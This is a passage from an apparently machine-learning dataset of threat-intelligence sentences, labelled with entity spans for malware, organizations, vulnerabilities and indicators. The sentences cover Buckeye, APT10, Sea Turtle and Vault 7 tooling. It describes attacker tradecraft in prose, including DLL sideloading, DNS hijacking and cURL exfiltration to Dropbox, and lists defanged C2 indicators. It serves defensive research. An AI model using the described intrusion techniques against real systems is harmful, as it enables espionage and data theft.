"Organization"}, {"start": 9224, "end": 9231, "label": "Malware"}, {"start": 9234, "end": 9251, "label": "Organization"}, {"start": 9300, "end": 9326, "label": "Malware"}, {"start": 9460, "end": 9475, "label": "Organization"}, {"start": 9498, "end": 9519, "label": "Malware"}, {"start": 9603, "end": 9612, "label": "Organization"}, {"start": 9634, "end": 9637, "label": "Malware"}, {"start": 9752, "end": 9765, "label": "Indicator"}, {"start": 9792, "end": 9798, "label": "Indicator"}, {"start": 9898, "end": 9913, "label": "Indicator"}, {"start": 9935, "end": 9945, "label": "Indicator"}, {"start": 9968, "end": 9987, "label": "Indicator"}, {"start": 9993, "end": 10003, "label": "Malware"}, {"start": 10050, "end": 10061, "label": "Indicator"}, {"start": 10073, "end": 10085, "label": "Indicator"}, {"start": 10338, "end": 10359, "label": "Organization"}, {"start": 10453, "end": 10467, "label": "Organization"}, {"start": 10628, "end": 10640, "label": "Organization"}, {"start": 10645, "end": 10654, "label": "Organization"}, {"start": 10657, "end": 10676, "label": "Organization"}, {"start": 10679, "end": 10688, "label": "Organization"}, {"start": 10691, "end": 10704, "label": "Organization"}, {"start": 10721, "end": 10730, "label": "Organization"}, {"start": 10754, "end": 10763, "label": "Organization"}, {"start": 10766, "end": 10776, "label": "Organization"}, {"start": 10781, "end": 10788, "label": "Organization"}, {"start": 10887, "end": 10908, "label": "Organization"}, {"start": 10919, "end": 10928, "label": "Organization"}, {"start": 10933, "end": 10952, "label": "Organization"}, {"start": 10955, "end": 10976, "label": "Organization"}, {"start": 11128, "end": 11139, "label": "Organization"}, {"start": 11180, "end": 11194, "label": "Organization"}, {"start": 11211, "end": 11217, "label": "System"}, {"start": 11283, "end": 11286, "label": "Indicator"}, {"start": 11521, "end": 11528, "label": "Organization"}, {"start": 11586, "end": 11619, "label": "Organization"}, {"start": 11622, "end": 11629, "label": "Organization"}, {"start": 11650, "end": 11664, "label": "Organization"}, {"start": 11714, "end": 11723, "label": "Malware"}, {"start": 11844, "end": 11857, "label": "Organization"}, {"start": 11866, "end": 11882, "label": "Malware"}, {"start": 12071, "end": 12080, "label": "Indicator"}, {"start": 12091, "end": 12103, "label": "Organization"}, {"start": 12289, "end": 12301, "label": "Organization"}, {"start": 12304, "end": 12311, "label": "Vulnerability"}, {"start": 12349, "end": 12358, "label": "Organization"}, {"start": 12396, "end": 12403, "label": "Organization"}, {"start": 12427, "end": 12447, "label": "Malware"}, {"start": 12549, "end": 12558, "label": "Organization"}, {"start": 12605, "end": 12612, "label": "Vulnerability"}, {"start": 12637, "end": 12644, "label": "System"}, {"start": 12676, "end": 12683, "label": "Organization"}, {"start": 12731, "end": 12751, "label": "Malware"}, {"start": 12853, "end": 12869, "label": "Organization"}, {"start": 12986, "end": 12994, "label": "Organization"}, {"start": 13027, "end": 13034, "label": "Organization"}, {"start": 13057, "end": 13066, "label": "Organization"}, {"start": 13069, "end": 13081, "label": "Organization"}, {"start": 13096, "end": 13116, "label": "Malware"}, {"start": 13179, "end": 13187, "label": "Organization"}, {"start": 13275, "end": 13280, "label": "Malware"}, {"start": 13390, "end": 13402, "label": "Organization"}, {"start": 13443, "end": 13455, "label": "Malware"}, {"start": 13554, "end": 13561, "label": "System"}, {"start": 13562, "end": 13570, "label": "Vulnerability"}, {"start": 13615, "end": 13623, "label": "Organization"}, {"start": 13626, "end": 13634, "label": "Organization"}, {"start": 13648, "end": 13655, "label": "System"}, {"start": 13656, "end": 13671, "label": "Vulnerability"}]}
{"text": "Recently , FireEye released a great report on one of the more active groups , now known as APT30 . The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools EternalRomance and EternalSynergy that were also released as part of the Shadow Brokers leak .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 91, "end": 96, "label": "Organization"}, {"start": 110, "end": 117, "label": "System"}, {"start": 134, "end": 147, "label": "Vulnerability"}, {"start": 225, "end": 232, "label": "Vulnerability"}, {"start": 239, "end": 253, "label": "Vulnerability"}, {"start": 258, "end": 272, "label": "Vulnerability"}, {"start": 312, "end": 326, "label": "Organization"}]}
{"text": "In addition , Kaspersky discovered that the Winnti group uses a popular backdoor known as PlugX which also has Chinese origins . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 44, "end": 50, "label": "Organization"}, {"start": 90, "end": 95, "label": "System"}, {"start": 148, "end": 156, "label": "Organization"}, {"start": 160, "end": 169, "label": "Organization"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 246, "end": 266, "label": "Malware"}]}
{"text": "Previous work published by security vendor FireEye in October 2014 suggests APT28 might be of Russian origin . The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S .", "spans": [{"start": 43, "end": 50, "label": "Organization"}, {"start": 76, "end": 81, "label": "Organization"}, {"start": 115, "end": 122, "label": "Organization"}]}
{"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky has continued to track the ScarCruft threat actor . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . However , Buckeye had already been using some of these leaked tools at least a year beforehand . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 . However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . One hour later , Bemstour was used against an educational institution in Belgium . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . DoublePulsar is then used to inject a secondary payload , which runs in memory only . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . Development of Bemstour has continued into 2019 . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the ACT the Windows SMB Server handles certain requests . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . It is noteworthy that the attackers never used the FuzzBunch framework in its attacks . FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . This IP is very interesting because it connects with tele.zyns.com and old infrastructures used by chinese APT or DDOS Chinese team against the ancient soviet republics . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . Today , this malware is still actively being used against the Philippines . Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . Xagent\u201d is the original filename Xagent.exe whereas seems to be the version of the worm . Xagent \u2013 A variant of JbossMiner Mining Worm\u201d \u2013 a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang \u2013 a cyberespionage campaign directed at diplomatic organizations in Europe . We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group \u2013 a backdoor we named Okrum . Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group \u2013 BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . Ke3chang behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies\u2019 trade secrets . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . Captured legitimate user credentials when users interacted with these actor - controlled servers . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . At this time , we do not believe that the attackers found a new ASA exploit . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server . In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . These actors perform DNS hijacking through the use of actor-controlled name servers . Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . we believe that the Sea Turtle campaign continues to be highly successful for several reasons . Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published . These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk LOCs Brutal Kangaroo and to keep its malware infestations going . Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable . Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border LOC \u2014 including France , Italy and Switzerland . A number of the CIA's electronic attack methods are designed for physical proximity . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . The attacker then infects and exfiltrates data to removable media . As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use . For example , Comodo was defeated by CIA malware placing itself in the Window's Recycle Bin . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . HIVE is a multi-platform CIA malware suite and its associated control software . A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn\u2019t be surprising they are the work of the group described in Kaspersky\u2019s Winnti \u2013 More than just a game\u201d . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , \u201d against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10\u2019s targeting of Japanese corporations in July 2018 . That attack was attributed to perpetrators Kaspersky called the Winnti Group . APT10 is a threat actor that has been active since at least 2009 . APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co. Ltd. and Laoying Baichen Instruments Equipment Co. Ltd . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . The December APT10 indictment noted that the group\u2019s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States . In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers\u2019 networks . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/Exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS ( JukeBox ) and Linux ( DanceFloor ) . . During this operation (dubbed \u2018Cloud Hopper\u201d because of the group\u2019s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China\u2019s civilian human intelligence agency . The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . Recorded Future has actively tracked APT10 for several years , focusing specifically on the group\u2019s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . Recorded Future\u2019s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group\u2019s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . They also identified broadly similar TTPs being used in the attack against a U.S. law firm specializing in intellectual property law . Rapid7\u2019s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 . In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . APT10 actors gained initial access to the Visma network around August 17 , 2018 . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . This means that APT10 actors had two separate access points into the Visma network . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . Other examples of malicious infrastructure registered with internet.bs include domains for APT28\u2019s VPNFilter malware campaign and the registration of the cyber-berkut . org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . The attacker gained access to the victim\u2019s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe.\u201d The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 . The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . For Exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe\u201d to r.exe\u201d to create archives , upload them with curl.exe\u201d (renamed to c.exe\u201d) , and again , use the cloud storage provider Dropbox . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S. Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains .", "spans": [{"start": 64, "end": 73, "label": "Organization"}, {"start": 101, "end": 110, "label": "Organization"}, {"start": 140, "end": 153, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 274, "end": 288, "label": "Organization"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 514, "end": 535, "label": "Malware"}, {"start": 542, "end": 551, "label": "Malware"}, {"start": 552, "end": 561, "label": "Malware"}, {"start": 572, "end": 583, "label": "Malware"}, {"start": 586, "end": 600, "label": "Malware"}, {"start": 607, "end": 621, "label": "Malware"}, {"start": 622, "end": 629, "label": "Malware"}, {"start": 630, "end": 635, "label": "Malware"}, {"start": 648, "end": 655, "label": "Organization"}, {"start": 693, "end": 705, "label": "Malware"}, {"start": 761, "end": 781, "label": "Malware"}, {"start": 785, "end": 792, "label": "Organization"}, {"start": 884, "end": 891, "label": "Organization"}, {"start": 1005, "end": 1019, "label": "Organization"}, {"start": 1071, "end": 1078, "label": "Organization"}, {"start": 1110, "end": 1131, "label": "Malware"}, {"start": 1140, "end": 1152, "label": "Malware"}, {"start": 1302, "end": 1309, "label": "Vulnerability"}, {"start": 1350, "end": 1357, "label": "Malware"}, {"start": 1358, "end": 